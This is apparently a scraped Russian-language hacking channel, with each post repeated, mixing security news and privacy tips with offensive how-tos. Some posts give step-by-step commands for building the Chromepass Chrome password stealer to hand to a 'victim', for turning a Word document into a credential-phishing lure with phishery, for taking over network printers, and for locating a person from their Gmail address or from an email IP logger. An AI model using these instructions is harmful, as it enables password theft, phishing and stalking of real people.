Как удаленно получить доступ к сохраненным паролям Chrome
Google Chrome используют 86% пользователей интернета. В нем хранится очень много полезной инфы о каждом пользователе.
Chromepass - это консольное приложение на Python, которое умеет добывать сохраненные пароли в Chrome. Требуется Python 3.6+.
Итак, в терминале:
$
$
$
Далее, выберите метод client.exe, введите свой IP. Включите сообщение об ошибке если нужно, и добавьте свое сообщение при необходимости.
Теперь подождите, пока исполняемые файлы будут готовы. Запустите client.exe. Файл server_ip.exe — должна получить жертва. После этого, в client.exe начинают появляться пароли, как показано на скрине.
#хакинг
Google Chrome используют 86% пользователей интернета. В нем хранится очень много полезной инфы о каждом пользователе.
Chromepass - это консольное приложение на Python, которое умеет добывать сохраненные пароли в Chrome. Требуется Python 3.6+.
Итак, в терминале:
$
cd chromepass
$ pip install -r requirements.txt
$
python -m pip install --upgrade pip
$
python -m pip install -r requirements.txt
$ python create_server.py
Далее, выберите метод client.exe, введите свой IP. Включите сообщение об ошибке если нужно, и добавьте свое сообщение при необходимости.
Теперь подождите, пока исполняемые файлы будут готовы. Запустите client.exe. Файл server_ip.exe — должна получить жертва. После этого, в client.exe начинают появляться пароли, как показано на скрине.
#хакинг
По России прошел ряд цифровых митингов
Пользователи Рунета в нескольких городах России устроили в "Яндекс.Картах" спонтанные массовые акции протеста, которые уже стали разгонять. Цифровые граждане пикетируют правительственные здания комментариями с различными лозунгами в «Яндекс.Картах».
Жители Ростова-на-Дону организовали виртуальный митинг в протест местным властям из-за режима самоизоляции. В приложении «Яндекс.Навигатор» у здания правительства области появились десятки комментариев с требованием ввести чрезвычайное положение или выплатить пособия. Кроме Ростова, «митинги на удалёнке» состоялась также в Москве и Красноярске, а вот в Екатеринбурге пикет «разогнали» - Яндекс удалил все лишние реплики.
«Чем платить ипотеку?», «хотим есть, что делать?», «дайте возможность работать» — такие комментарии оставляли пользователи «Яндекс.Навигатора».
#новость
Пользователи Рунета в нескольких городах России устроили в "Яндекс.Картах" спонтанные массовые акции протеста, которые уже стали разгонять. Цифровые граждане пикетируют правительственные здания комментариями с различными лозунгами в «Яндекс.Картах».
Жители Ростова-на-Дону организовали виртуальный митинг в протест местным властям из-за режима самоизоляции. В приложении «Яндекс.Навигатор» у здания правительства области появились десятки комментариев с требованием ввести чрезвычайное положение или выплатить пособия. Кроме Ростова, «митинги на удалёнке» состоялась также в Москве и Красноярске, а вот в Екатеринбурге пикет «разогнали» - Яндекс удалил все лишние реплики.
«Чем платить ипотеку?», «хотим есть, что делать?», «дайте возможность работать» — такие комментарии оставляли пользователи «Яндекс.Навигатора».
#новость
Как ''пробить'' по IP адресу с помощью Termux
1. Скачиваем репозиторий:
После ввода IP, мы получаем такую информацию как: Город, страна, широту - долготу, провайдер интернета, почтовый индекс и многое другое.
#OSINT #termux
1. Скачиваем репозиторий:
git clone https://github.com/maldevel/IPGeoLocation
2. Открываем директорию:cd IPGeoLocation
3. Добавляем разрешение файлу:chmod +x *
4. Устанавливаем требования:pip install -r requirements.txt
5. Запускаем программу:python ipgeolocation.py -t [
IP адрес]
После ввода IP, мы получаем такую информацию как: Город, страна, широту - долготу, провайдер интернета, почтовый индекс и многое другое.
#OSINT #termux
Отправляем зашифрованные электронные письма с помощью Mailvelope
К сожалению, отправка писем через электронную почту в наше время небезопасна, а почтовые провайдеры не спешат реализовать функцию шифрования писем.
Удобное расширение Mailvelope для провайдеров электронной почты: Gmail, Yahoo и других обеспечивает шифрование писем на основе PGP. Оно позволяет отправлять зашифрованные письма, которые не сможет прочитать никто, кроме вас и получателя. Вам просто нужно зашифровать электронное письмо паролем и сообщить его получателю.
Шифрование происходит на стороне клиента, поэтому даже разработчики расширения не могут получить доступ к сообщениям. Расширение использует в работе JavaScript-реализацию стандарта OpenPGP, а исходный код программы открыт.
Mailvelope: Chrome | Firefox
#безопасность
К сожалению, отправка писем через электронную почту в наше время небезопасна, а почтовые провайдеры не спешат реализовать функцию шифрования писем.
Удобное расширение Mailvelope для провайдеров электронной почты: Gmail, Yahoo и других обеспечивает шифрование писем на основе PGP. Оно позволяет отправлять зашифрованные письма, которые не сможет прочитать никто, кроме вас и получателя. Вам просто нужно зашифровать электронное письмо паролем и сообщить его получателю.
Шифрование происходит на стороне клиента, поэтому даже разработчики расширения не могут получить доступ к сообщениям. Расширение использует в работе JavaScript-реализацию стандарта OpenPGP, а исходный код программы открыт.
Mailvelope: Chrome | Firefox
#безопасность
Восьмилетняя девочка обошла родительский контроль на iPhone
Функция iOS под названием Screen Time призвана упростить жизнь родителям и дать им больше контроля над тем, что их ребенок делает с телефоном. В частности, она позволяет ограничивать или вовсе отключать на устройстве некоторые приложения.
По словам пользователя Reddit, его сестра воспользовалась iMessage App Store, чтобы получить доступ к приложениям, заблокированным через Screen Time.
Сам «хак» очень прост. Пользователь должен открыть iMessage, чтобы написать новое сообщение, а затем открыть iMessage App Store с панели управления. В iMessage App Store нужно ввести в поиск требуемое приложения (в случае девочки это был YouTube) и нажать на «Открыть». Приложение откроется как ни в чем не бывало, даже если оно было заблокировано с помощью Screen Time.
#новость
Функция iOS под названием Screen Time призвана упростить жизнь родителям и дать им больше контроля над тем, что их ребенок делает с телефоном. В частности, она позволяет ограничивать или вовсе отключать на устройстве некоторые приложения.
По словам пользователя Reddit, его сестра воспользовалась iMessage App Store, чтобы получить доступ к приложениям, заблокированным через Screen Time.
Сам «хак» очень прост. Пользователь должен открыть iMessage, чтобы написать новое сообщение, а затем открыть iMessage App Store с панели управления. В iMessage App Store нужно ввести в поиск требуемое приложения (в случае девочки это был YouTube) и нажать на «Открыть». Приложение откроется как ни в чем не бывало, даже если оно было заблокировано с помощью Screen Time.
#новость
Как взломать принтер в локальной сети
Для того, чтобы перехватить управление беспроводным принтером, нам понадобиться подключиться к WiFi сети, в которой работает этот принтер. Данная утилита работает как на Kali linux, так и на Termux.
Установка:
Запускаем программу:
#хакинг #IoT
Для того, чтобы перехватить управление беспроводным принтером, нам понадобиться подключиться к WiFi сети, в которой работает этот принтер. Данная утилита работает как на Kali linux, так и на Termux.
Установка:
apt update & apt upgrade
pip2 install colorama
git clone https://github.com/RUB-NDS/PRET
cd PRET
pip install colorama pysnmP
Далее, нам нужно будет узнать IP адрес нашего принтера, сделать это можно в настройках принтера или через программу WiFi Analyzer. Это приложение сканирует WiFi сеть и показывает, локальные IP устройств, которые к ней подключены. Запускаем программу:
python2 pret.py (IP принтера) pjl
Если подключение успешно, то вам будет доступен ввод различных команд для управления принтером. Командой help
можно посмотреть все доступные функции, среди которых: печать произвольного текста или файла, отображение текста на дисплее принтера, флуд печатью и многое другое. #хакинг #IoT
Скачиваем все фото с инстаграм аккаунта с помощью Termux
Очень полезная программа, которая позволяет скачать сразу все фото из инстаграм аккаунта. По понятным причинам работает только для публичных аккаунтов.
1. Скачиваем нужные пакеты
#termux
Очень полезная программа, которая позволяет скачать сразу все фото из инстаграм аккаунта. По понятным причинам работает только для публичных аккаунтов.
1. Скачиваем нужные пакеты
apt update && apt upgrade && pkg install python
2. Скачиваем программуpip install instaloader
3. Запускаем программуinstaloader profile имя_пользователя
Чтобы посмотреть скачанные фото, перекинем их в корневую директорию устройства.cp -r имя_пользователя /sdcard
#termux
Получаем открытую информацию о сайте или IP-адресе
Главной ценностью информации является её оперативность и теперь вам не нужно открывать браузер, чтобы получить информацию о необходимом сайте или IP-адресе.
С помощью бота @whoisdombot можно узнать основную whois-информацию для доменного имени и IP-адреса, среди которой:
— Дата регистрации домена;
— Контактная информация владельца;
— Информация о доменном регистраторе;
— Дата окончания регистрации домена.
Также можно отправить боту IP адрес, например компьютера и узнать информацию о его провайдере и местонахождении с точностью до города.
#OSINT #telegram
Главной ценностью информации является её оперативность и теперь вам не нужно открывать браузер, чтобы получить информацию о необходимом сайте или IP-адресе.
С помощью бота @whoisdombot можно узнать основную whois-информацию для доменного имени и IP-адреса, среди которой:
— Дата регистрации домена;
— Контактная информация владельца;
— Информация о доменном регистраторе;
— Дата окончания регистрации домена.
Также можно отправить боту IP адрес, например компьютера и узнать информацию о его провайдере и местонахождении с точностью до города.
#OSINT #telegram
Как браузер может идентифицировать пользователя
Цифровой отпечаток устройства - это невероятно точный метод выявления уникальных браузеров и отслеживания онлайн-активности. Веб-сайты используют его для для сбора информации о типе и версии браузера, а также о вашей операционной системе, активных плагинах, часовом поясе, языке, разрешении экрана и других активных настройках.
Поначалу эти данные могут показаться общими и не помогут в идентификации одного конкретного человека. Тем не менее, вероятность того, что цифровой отпечаток у другого пользователя информация будет совпадать на 100%, весьма мала. Только 1 из 286 777 других браузеров будет иметь тот же отпечаток, что и вы.
Сайт https://amiunique.org поможет вам понять, на сколько уникален ваш цифровой отпечаток и какие параметры выдают вас среди других пользователей.
#анонимность
Цифровой отпечаток устройства - это невероятно точный метод выявления уникальных браузеров и отслеживания онлайн-активности. Веб-сайты используют его для для сбора информации о типе и версии браузера, а также о вашей операционной системе, активных плагинах, часовом поясе, языке, разрешении экрана и других активных настройках.
Поначалу эти данные могут показаться общими и не помогут в идентификации одного конкретного человека. Тем не менее, вероятность того, что цифровой отпечаток у другого пользователя информация будет совпадать на 100%, весьма мала. Только 1 из 286 777 других браузеров будет иметь тот же отпечаток, что и вы.
Сайт https://amiunique.org поможет вам понять, на сколько уникален ваш цифровой отпечаток и какие параметры выдают вас среди других пользователей.
#анонимность
Как запутать своего интернет-провайдера через Termux
Всем давно известно, что провайдеры ведут логи и собирают информацию о том, какие сайты мы посещаем и когда мы это делаем.
Эта программа будет делать множество запрос в день на различные сайты с вашего IP, что может запутать провайдера, который пристально следит за вами.
1. Скачиваем нужные пакеты:
--log -l -> Настройка уровеня регистрации
--config -c -> Кастомный config файл
--timeout -t -> Время работаты сканера (в секундах)
#анонимность #termux
Всем давно известно, что провайдеры ведут логи и собирают информацию о том, какие сайты мы посещаем и когда мы это делаем.
Эта программа будет делать множество запрос в день на различные сайты с вашего IP, что может запутать провайдера, который пристально следит за вами.
1. Скачиваем нужные пакеты:
apt update && apt upgrade -y && apt install python git -y
2. Скачиваем зависимости:pip install requests
3. Скачиваем репозиторий:git clone https://github.com/1tayH/noisy.git
4. Открываем директорию:cd noisy
5. Запускаем файл:python noisy.py --config config.json
Опцианальные аргументы:--log -l -> Настройка уровеня регистрации
--config -c -> Кастомный config файл
--timeout -t -> Время работаты сканера (в секундах)
#анонимность #termux
Кража ваших SMS сообщений с помощью 0day уязвимости в iOS
Недавно пользователь твиттра s1guza нашел уязвимость нулевого дня в новейшей, не бета-версии iOS (13.4.1), которая позволяет написать вредоносное приложение для кражи истории сообщений iMessage.
Для воспроизведения уязвимости нужно создать вредоносное приложение, которое загружает файл
Этот баг был исправлен в бета-версии iOS 13.5, однако для обновления эта версия еще не доступна, поэтому не устанавливайте подозрительные приложения, пока Apple не выпустит обновление.
#новость
Недавно пользователь твиттра s1guza нашел уязвимость нулевого дня в новейшей, не бета-версии iOS (13.4.1), которая позволяет написать вредоносное приложение для кражи истории сообщений iMessage.
Для воспроизведения уязвимости нужно создать вредоносное приложение, которое загружает файл
sms.db
и отправляет на сервер, подписать его и установить на устройство. Далее включить принимающий сервер и как только приложение будет запущено, на сервере появится база данных.Этот баг был исправлен в бета-версии iOS 13.5, однако для обновления эта версия еще не доступна, поэтому не устанавливайте подозрительные приложения, пока Apple не выпустит обновление.
#новость
Как получить местонахождение человека, использующего Gmail
Пользователи Google нередко оставляют отзывы о заведениях, которые посещают. Однако, они иногда не подозревают, что имея на руках адрес электронной почты можно с легкостью узнать, какие отзывы и где человек оставлял. А исходя из этого, понять его примерное местонахождение.
1. Заходим на contacts.google.com и добавляем E-Mail в контакты.
2. Наводим на меленькую фотографию контакта в левом нижнем углу появившегося окошка и заходим в код элемента.
3. Находим строчку <div class="NVFbjd LAORIe " data-sourceid="115978902187173497207"> и копируем числовое значение - это GoogleID
4. Вставляем его вместо <GoogleID> в ссылку https://www.google.com/maps/contrib/<GoogleID> и переходим по ней.
Если человек когда либо оставлял отзывы, вы увидите, где и когда это было, и что он писал.
Пользователи Google нередко оставляют отзывы о заведениях, которые посещают. Однако, они иногда не подозревают, что имея на руках адрес электронной почты можно с легкостью узнать, какие отзывы и где человек оставлял. А исходя из этого, понять его примерное местонахождение.
1. Заходим на contacts.google.com и добавляем E-Mail в контакты.
2. Наводим на меленькую фотографию контакта в левом нижнем углу появившегося окошка и заходим в код элемента.
3. Находим строчку <div class="NVFbjd LAORIe " data-sourceid="115978902187173497207"> и копируем числовое значение - это GoogleID
4. Вставляем его вместо <GoogleID> в ссылку https://www.google.com/maps/contrib/<GoogleID> и переходим по ней.
Если человек когда либо оставлял отзывы, вы увидите, где и когда это было, и что он писал.
Хакеры воровали данные через вредоносный код в иконках сайтов
Недавно аналитики выявили новую серию странных взломов интернет-магазинов, единственной целью которых была подмена иконок (favicon) на взломанных сайтах. Новые favicon представляли собой файлы изображений, размещенные на неком сайте MyIcons, и не содержали вредоносного кода. Хитрость заключалась в том, что сайт MyIcons предоставлял легитимный файл favicon для всех страниц атакованного ресурса, кроме тех, где размещались формы оформления заказа.
На страницах оформления заказа MyIcons подменял обычный favicon вредоносным файлом JavaScript, который создавал поддельную форму оплаты и воровал введенные в нее данные карты пользователя.
Владельцы сайтов, заметившие обращения к MyIcons, обнаружили бы безвредный портал для хостинга favicon. Однако на самом деле данный сайт выступал клоном легитимного портала IconArchive.com и служил обычной ширмой для проведения атак.
#новость
Недавно аналитики выявили новую серию странных взломов интернет-магазинов, единственной целью которых была подмена иконок (favicon) на взломанных сайтах. Новые favicon представляли собой файлы изображений, размещенные на неком сайте MyIcons, и не содержали вредоносного кода. Хитрость заключалась в том, что сайт MyIcons предоставлял легитимный файл favicon для всех страниц атакованного ресурса, кроме тех, где размещались формы оформления заказа.
На страницах оформления заказа MyIcons подменял обычный favicon вредоносным файлом JavaScript, который создавал поддельную форму оплаты и воровал введенные в нее данные карты пользователя.
Владельцы сайтов, заметившие обращения к MyIcons, обнаружили бы безвредный портал для хостинга favicon. Однако на самом деле данный сайт выступал клоном легитимного портала IconArchive.com и служил обычной ширмой для проведения атак.
#новость
Откажитесь от автоподключения к Wi-Fi
В iPhone есть удобная функция, позволяющая автоматически подключаться к знакомым Wi-Fi-сетям. Как только смартфон видит знакомую сеть, он тут же пытается подключиться к ней, не спрашивая разрешения у пользователя. С одной стороны, это удобно. С другой стороны, никто не мешает злоумышленнику настроить свою, поддельную Wi-Fi-сеть и замаскировать ее под известный публичный хотспот, дав ей то же имя.
В результате вы можете даже не заметить, что пользуетесь Интернетом не через сотовую сеть, а через Wi-Fi, в то время как ваши данные уже потекут к хакеру на сервер. Тщательно проверяйте, к каким сетям вы подключаетесь, предварительно заставив iPhone «забыть» знакомые сети и включив подтверждение подключения к Wi-Fi, что значительно снизит риск незаметно подключиться к потенциально опасной Wi-Fi-сети.
Зайдите в «Настройки» –> «Wi-Fi» –> Выбрать нужную беспроводную сеть –> «Забыть эту сеть» –> «Вернуться в Wi-Fi» –> «Подтверждать подключение: вкл.».
#безопасность #iPhone
В iPhone есть удобная функция, позволяющая автоматически подключаться к знакомым Wi-Fi-сетям. Как только смартфон видит знакомую сеть, он тут же пытается подключиться к ней, не спрашивая разрешения у пользователя. С одной стороны, это удобно. С другой стороны, никто не мешает злоумышленнику настроить свою, поддельную Wi-Fi-сеть и замаскировать ее под известный публичный хотспот, дав ей то же имя.
В результате вы можете даже не заметить, что пользуетесь Интернетом не через сотовую сеть, а через Wi-Fi, в то время как ваши данные уже потекут к хакеру на сервер. Тщательно проверяйте, к каким сетям вы подключаетесь, предварительно заставив iPhone «забыть» знакомые сети и включив подтверждение подключения к Wi-Fi, что значительно снизит риск незаметно подключиться к потенциально опасной Wi-Fi-сети.
Зайдите в «Настройки» –> «Wi-Fi» –> Выбрать нужную беспроводную сеть –> «Забыть эту сеть» –> «Вернуться в Wi-Fi» –> «Подтверждать подключение: вкл.».
#безопасность #iPhone
Как получить учетные данные пользователя через Microsoft Word
Phishery встраивает в существующий документ Microsoft Word появляющееся окно с требованием ввести имя пользователя и пароль.
Установка в Kali Linux:
$
$
Открываем файл настроек (settings.json), в настройках нам нужно указать:
port — порт, на котором будет работать сервер.
После настройки phishery, загружаем на сервер файл в формате docx, в который мы встроим фишинговый код:
Запускаем сервер, для получения и сохранения аутентификационных данных:
$
Теперь отправляем файл жертве и ждем открытия. При открытии файла, поверх MS Word появится окно запроса имени и пароля. При вводе любых данных и нажатии OK, мы получим эти данные и они отобразятся в логах и запишутся в файл credentials.json.
Phishery встраивает в существующий документ Microsoft Word появляющееся окно с требованием ввести имя пользователя и пароль.
Установка в Kali Linux:
$ apt-get install phishery
$
mkdir phishery
$
tar -xvf phishery.tar.gz --strip=1 -C ./phishery
cd phishery
Открываем файл настроек (settings.json), в настройках нам нужно указать:
port — порт, на котором будет работать сервер.
После настройки phishery, загружаем на сервер файл в формате docx, в который мы встроим фишинговый код:
./phishery -u https://example.com/docs -i zarplata.docx -o zarplata_phish.docx
Запускаем сервер, для получения и сохранения аутентификационных данных:
$
./phishery -s settings.json -c credentials.json
Теперь отправляем файл жертве и ждем открытия. При открытии файла, поверх MS Word появится окно запроса имени и пароля. При вводе любых данных и нажатии OK, мы получим эти данные и они отобразятся в логах и запишутся в файл credentials.json.
P2P чат в Termux
Как вы знаете, все сообщения, что вы отправляете в сети проходят через централизованный сервер, что не безопасно по целому ряду очевидных причин. Сегодня, я расскажу вам, как общаться в одноранговой сети (P2P) используя NetCat.
Для того, чтоб протестировать эту сеть 2 устройства не понадобится, можно использовать 2 вкладки в Termux.
1-ое устройство
1. Скачиваем NetCat
$
2. Узнаем свой IP
$
3. Открываем порт на прослушку (абсолютно любые 5 цифр)
$
2-ое устройство
1. Также скачиваем NetCat
$
2. Подключаемся к первому устройству используя ip и порт
$
#безопасность #termux
Как вы знаете, все сообщения, что вы отправляете в сети проходят через централизованный сервер, что не безопасно по целому ряду очевидных причин. Сегодня, я расскажу вам, как общаться в одноранговой сети (P2P) используя NetCat.
Для того, чтоб протестировать эту сеть 2 устройства не понадобится, можно использовать 2 вкладки в Termux.
1-ое устройство
1. Скачиваем NetCat
$
pkg install netcat
2. Узнаем свой IP
$
ifconfig
3. Открываем порт на прослушку (абсолютно любые 5 цифр)
$
nc -l -p 56789
2-ое устройство
1. Также скачиваем NetCat
$
pkg install netcat
2. Подключаемся к первому устройству используя ip и порт
$
nc IP 56789
#безопасность #termux
Как узнать IP адрес человека, открывшего электронное письмо
Многие привыкли думать, что отправитель письма не знает, когда мы его открыли и открыли ли вообще. Однако это далеко не так.
Для начала, нам нужно получить ссылку для отслеживания, для этого заходим на https://iplogger.ru, нажимаем Невидимый логгер и сохраняем к себе полученную ссылку. Далее нам понадобится HTML код письма, в котором необходимо заменить http://TRACKING URL/ на нашу ссылку из IPLogger.
По умолчанию почтовики Gmail, Yandex и другие не поддерживают HTML форматирование, поэтому в поле ввода текста письма введите произвольный текст, а затем нажмите правую клавишу мыши и выберите пункт меню «Просмотреть код». В появившемся окне найдите элемент c нашим текстом и выберите «Edit as HTML». В появившемся блоке замените текст на код, предварительно вставив свою ссылку, и нажмите Ctrl+Enter.
Теперь меняем текст письма в самом редакторе и нажимаем отправить. Когда получатель откроет ваше письмо, в панели управления логгером появится его IP адрес. Данный способ работает не со всеми почтовыми клиентами.
Многие привыкли думать, что отправитель письма не знает, когда мы его открыли и открыли ли вообще. Однако это далеко не так.
Для начала, нам нужно получить ссылку для отслеживания, для этого заходим на https://iplogger.ru, нажимаем Невидимый логгер и сохраняем к себе полученную ссылку. Далее нам понадобится HTML код письма, в котором необходимо заменить http://TRACKING URL/ на нашу ссылку из IPLogger.
По умолчанию почтовики Gmail, Yandex и другие не поддерживают HTML форматирование, поэтому в поле ввода текста письма введите произвольный текст, а затем нажмите правую клавишу мыши и выберите пункт меню «Просмотреть код». В появившемся окне найдите элемент c нашим текстом и выберите «Edit as HTML». В появившемся блоке замените текст на код, предварительно вставив свою ссылку, и нажмите Ctrl+Enter.
Теперь меняем текст письма в самом редакторе и нажимаем отправить. Когда получатель откроет ваше письмо, в панели управления логгером появится его IP адрес. Данный способ работает не со всеми почтовыми клиентами.
Расширение для быстрого просмотра данных Exif
Фотографии содержат много информации. Прикрепленные метаданные могут показать, где была сделана фотография, какой тип камеры и ее настройки использовались во время фотосъемки. Для получения доступа к этой скрытой информации можно использовать несколько расширений, которые позволяют получать данные Exif одним кликом мыши.
Многие веб-сайты удаляют данные Exif из загруженных изображений, но некоторые этого не делают. На скриншоте ниже можно точно увидеть, когда была сделана эта фотография, а также тип используемой камеры и какие настройки камеры использовались.
💾 Установите Exif Viewer: Firefox | Chrome
#полезно
Фотографии содержат много информации. Прикрепленные метаданные могут показать, где была сделана фотография, какой тип камеры и ее настройки использовались во время фотосъемки. Для получения доступа к этой скрытой информации можно использовать несколько расширений, которые позволяют получать данные Exif одним кликом мыши.
Многие веб-сайты удаляют данные Exif из загруженных изображений, но некоторые этого не делают. На скриншоте ниже можно точно увидеть, когда была сделана эта фотография, а также тип используемой камеры и какие настройки камеры использовались.
💾 Установите Exif Viewer: Firefox | Chrome
#полезно
В Китае устанавливают камеры наблюдения внутри квартир граждан
Пандемия коронавируса приблизила камеры наблюдения к приватной жизни людей: вместо общественных мест они теперь устанавливаются перед входными дверями, а в некоторых случаях даже внутри квартир жителей, даже без их разрешения.
Жительница Гуанчжоу, сообщила, что перед её дверью установили видеокамеру с лампами, которые ярко светят в лицо, когда она открывает входную дверь. А вернувшемуся домой жителю города Чанчжоу на следующий день установили камеру, направленную на входную дверь, со стены шкафа в прихожей. Очевидцы сообщают, что камеры для наблюдения за находящимися в карантине жителями передают картинку на смартфоны полицейских и общественных работников.
Также некоторым гражданам на карантине вместо видеокамеры ставят на дверь магнитную сигнализацию, которая уведомляет власти об открытии дверей.
#новость
Пандемия коронавируса приблизила камеры наблюдения к приватной жизни людей: вместо общественных мест они теперь устанавливаются перед входными дверями, а в некоторых случаях даже внутри квартир жителей, даже без их разрешения.
Жительница Гуанчжоу, сообщила, что перед её дверью установили видеокамеру с лампами, которые ярко светят в лицо, когда она открывает входную дверь. А вернувшемуся домой жителю города Чанчжоу на следующий день установили камеру, направленную на входную дверь, со стены шкафа в прихожей. Очевидцы сообщают, что камеры для наблюдения за находящимися в карантине жителями передают картинку на смартфоны полицейских и общественных работников.
Также некоторым гражданам на карантине вместо видеокамеры ставят на дверь магнитную сигнализацию, которая уведомляет власти об открытии дверей.
#новость
Прямая передача файлов между устройствами по WebRTC
Новый сервис WebWormHole позволяет передавать файлы с одного компьютера на другой через пиринговый тоннель, который быстрее и безопаснее, чем передача по почте, FTP или другими способами.
Для того, чтобы установить соединение зайдите на сайт и нажмите кнопку «New Wormhole». Вы получите код для входа, который человек с другой стороны должен ввести, чтобы между вами установился туннель, по которому напрямую передаются файлы. Далее просто загружаете файл и он моментально будет передан получателю на другом конце тоннеля.
Для установки портала между устройствами необязательно открывать браузер, клиент на Go запускается из командной строки и генерирует одноразовый код в консоли, где и происходит передача данных. Инструкция по установке и исходный код доступны на GitHub.
#безопасность
Новый сервис WebWormHole позволяет передавать файлы с одного компьютера на другой через пиринговый тоннель, который быстрее и безопаснее, чем передача по почте, FTP или другими способами.
Для того, чтобы установить соединение зайдите на сайт и нажмите кнопку «New Wormhole». Вы получите код для входа, который человек с другой стороны должен ввести, чтобы между вами установился туннель, по которому напрямую передаются файлы. Далее просто загружаете файл и он моментально будет передан получателю на другом конце тоннеля.
Для установки портала между устройствами необязательно открывать браузер, клиент на Go запускается из командной строки и генерирует одноразовый код в консоли, где и происходит передача данных. Инструкция по установке и исходный код доступны на GitHub.
#безопасность
Малварь прячет управляющие серверы в описаниях YouTube-каналов
Инфостилер Astaroth впервые был замечен специалистами еще в 2018 году. Он использует множество антианалитических и антиsandbox механик, что крайне затрудняет как обнаружение малвари, так и изучение ее операций. Перед выполнением малварь проводит различные проверки, чтобы убедиться, что работает на реальном компьютере, а не в песочнице. Это помогает скрывать пейлоады и оставаться незамеченной.
Однако вышеописанными препонами разработчики трояна не ограничились. Так, после последнего обновления Astaroth стал использовать описания каналов на YouTube, чтобы скрывать URL своих управляющих серверов от любопытных глаз.
После того, как троян заразил машину жертвы, он подключается к специальному каналу на YouTube и обращается к полю описания этого канала. Поле содержит закодированный base64 текст с URL-адресами управляющих серверов. Расшифровав данные, Astaroth подключается к этим URL-адресам, чтобы получить новые команды от своих операторов и предать им похищенную информацию.
#новость
Инфостилер Astaroth впервые был замечен специалистами еще в 2018 году. Он использует множество антианалитических и антиsandbox механик, что крайне затрудняет как обнаружение малвари, так и изучение ее операций. Перед выполнением малварь проводит различные проверки, чтобы убедиться, что работает на реальном компьютере, а не в песочнице. Это помогает скрывать пейлоады и оставаться незамеченной.
Однако вышеописанными препонами разработчики трояна не ограничились. Так, после последнего обновления Astaroth стал использовать описания каналов на YouTube, чтобы скрывать URL своих управляющих серверов от любопытных глаз.
После того, как троян заразил машину жертвы, он подключается к специальному каналу на YouTube и обращается к полю описания этого канала. Поле содержит закодированный base64 текст с URL-адресами управляющих серверов. Расшифровав данные, Astaroth подключается к этим URL-адресам, чтобы получить новые команды от своих операторов и предать им похищенную информацию.
#новость